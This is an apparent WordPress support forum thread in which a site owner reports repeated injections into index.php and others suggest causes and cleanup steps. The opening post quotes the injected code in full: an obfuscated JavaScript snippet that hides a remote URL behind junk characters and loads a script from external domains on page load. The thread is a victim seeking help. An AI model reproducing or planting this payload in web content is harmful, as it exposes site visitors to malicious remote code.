• Over the last few weeks, I have had multiple intrusions into my site. Mainly the main index.php in the root WP directory.

    Every few days, I find new malicious code in there. Initially, it was just IFRAMEs, but now I’m seeing this Javascript code in there:

    <script>/*GNU GPL*/ try{window.onload = function(){var Ufxkuzrk298 = document.createElement('script');Ufxkuzrk298.setAttribute('type', 'text/javascript');Ufxkuzrk298.setAttribute('id', 'myscript1');Ufxkuzrk298.setAttribute('src',  'h!@t^t&^#p&:$@/$)#$/@!!a^@l)$)l(&^y@#e(&(!s(^)-#(c$)&&o&m(@#&.)e@$x($!p#$!&e)^^d#(i&#a^.&&@c#o$)m$!).$m#&((a)))k!@&t#)o!#)o&b^(-$c()!&o)!m!&.&)j^a(&c!k^#(f!@#r&(o($s^)@t#$^m@o((v!(#@i(e@@s$^(.^^&&r@u&&)):!8#&^0#)8!0()(^@/)!&!)c(^h(#!i!#$n^@^a$z($.(@^c)$^o##)m@)/(^&c^h))^i#&!@n&#&a$(z!.)!c$o#$m@@$/#$$^g@o)&o^#^g$!l#@##e(.@^&c&&o^m!)&!/&#b#$(e&)s$!@t!)b#$^u(((y(@#.))$c@&o##!^m&!$/@@&5(^^1@&j(!o)!@^b)#.(c#(^#!o)!m)&#/&@&'.replace(/&|\$|#|\!|\(|\)|@|\^/ig, ''));Ufxkuzrk298.setAttribute('defer', 'defer');document.body.appendChild(Ufxkuzrk298);}} catch(e) {}</script>

    I have already made all the initial steps to try to remove this. I have the latest version of WP running, I’ve changed all my passwords, and this is still happening.

    Does anybody know if there is a way to just lock down the index.php file from being edited? Or a way to track who edits the file so I can block the IP?

    Thanks

Viewing 15 replies - 1 through 15 (of 17 total)
  • Are you sure that you have completely cleaned all files? Most hackers will leave an unobtrusive backdoor somewhere that enables them to regain access to your site. Try working through these resources:

    https://codex.www.ads-software.com/FAQ_My_site_was_hacked
    https://www.ads-software.com/support/topic/268083#post-1065779
    https://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    Do you upload files with an ftp client that stores your site passwords? If so you may have a computer virus that’s logging those passwords and sending them to the hacker (I’ve been through this myself). All you can do is check for viruses on your computer and clean up what you find asap. In the meantime, go into your hosting account and change the password (but don’t save it in your ftp client). Or contact your webhost and have them change your hosting account password until your computer is cleaned up.

    Do a quick check now: Ctrl + Alt + Delete and look up all the processes that are currently running on your computer. That might reveal a keylogger or virus.

    Thread Starter RobInjection

    (@robinjection)

    I run on a Mac, so I’m sure it’s not a virus.

    Also, I ran through almost all of those steps, short of reinstalling WordPress cleanly and reimporting everything (which I can’t afford to do)

    This is very similar to what I experienced, someone mentions Mac users being a commonality among the sites he tried helping (don’t know if that’s confirming anything though):

    https://www.ads-software.com/support/topic/281767?replies=38

    More info in there (webservers maybe being hacked, etc.). My problem was the filezilla + adobe 8.0 but I understand that it’s not soley filezilla that this thing goes after.

    What do you mean you can’t afford to reinstall all wp files? The time that it takes? I’d delete everything and re-upload fresh copies–and double check all file permissions.

    Good luck!

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.ads-software.com Admin

    I run on a Mac, so I’m sure it’s not a virus.

    Hahahahah! Malware and trojans exist for the Mac too. Don’t believe the Apple hype.

    That said, are you running on a “shared host”? A lot of the time I see shared hosts get compromised on a different site on the same machine, and then because the host doesn’t have proper security, the attacker can run a script that goes and auto-hacks every site it finds on the machine.

    The fact that your “index.php” keeps getting stuff added to it is a good sign of this sort of thing.

    The only real fix: Find a better hosting service.

    Thread Starter RobInjection

    (@robinjection)

    I have a dedicated virtual server, so it’s not shared.

    Also, I understand Mac’s can get trojans, but please believe me when I say I am not a newb and would not be susceptible to this. Also, I run plenty of other WP sites which are not hacked.

    The reason I said I can not afford to do a clean install is because my site is very huge and delicate like a giant elephant haha

    @terry Thanks for that link. I will try that AntiVirus plugin. Hopefully it will work.

    https://www.ads-software.com/extend/plugins/antivirus/

    Quick question: do you sftp or ftp?

    Can you restrict access to your account so only your ip can gain access? At least until you figure out “how” they’re getting in?

    Thread Starter RobInjection

    (@robinjection)

    thanks for all your responses!

    I tried that remove-virus.php script and it didnt seem to respond, probably because my site is huge.

    I did go through my wp-content folder though. based on @claytonjames’ recommendation and found a few old cache folders that I wasn’t using that may have contained the virus file. I downloaded the remainder of my wp-content folder and found no trace of their the iframe code or the Javascript code.

    Hopefully this does it.

    Also, Terry, I FTP in, and I’m not sure how to restrict it to just my IP. Is it possible to do with Plesk?

    Hey there. We came across this on one of our client sites. It’s pretty much as the lads described above (ftp compromised etc). We’ve written up a blog on it to help others out.
    https://www.cubedroute.com/weblog/website-virus-removal-and-post-mortem/

    ok i had the same problem wiht my installation of Wp as well.. its a replicating script. From what i learned, it replicates itself no matter what you do. It has a backdoor programmed in and it affects your files outside of the WP installation as well. there is no definite way to remove it except that you have to do a complete nuke of your public_html folder.

    Take a backup of your MySql database. The script does not affect it. Then do the nuke, re-install wordpress and simply import your old database files into the new one through the PHP-MyAdmin utility in Cpanel.

    I deduced that this happens owing to security vulnerabilities in other open-source installations. Do you by any chance have Zen-Cart installed on your server? In my case, the script injection attack was through Zen-Cart…

    Also, Terry, I FTP in, and I’m not sure how to restrict it to just my IP. Is it possible to do with Plesk?

    I’d suggest switching to sftp since one of my hosts informed me that this gang watches ftp connections to gain server passwords.

    Plesk…sorry but I have no experience with that.

    johnnykane I can’t access your page, my antivirus program is screaming that it’s an infected website.

Viewing 15 replies - 1 through 15 (of 17 total)
  • The topic ‘Main index.php constantly being hacked’ is closed to new replies.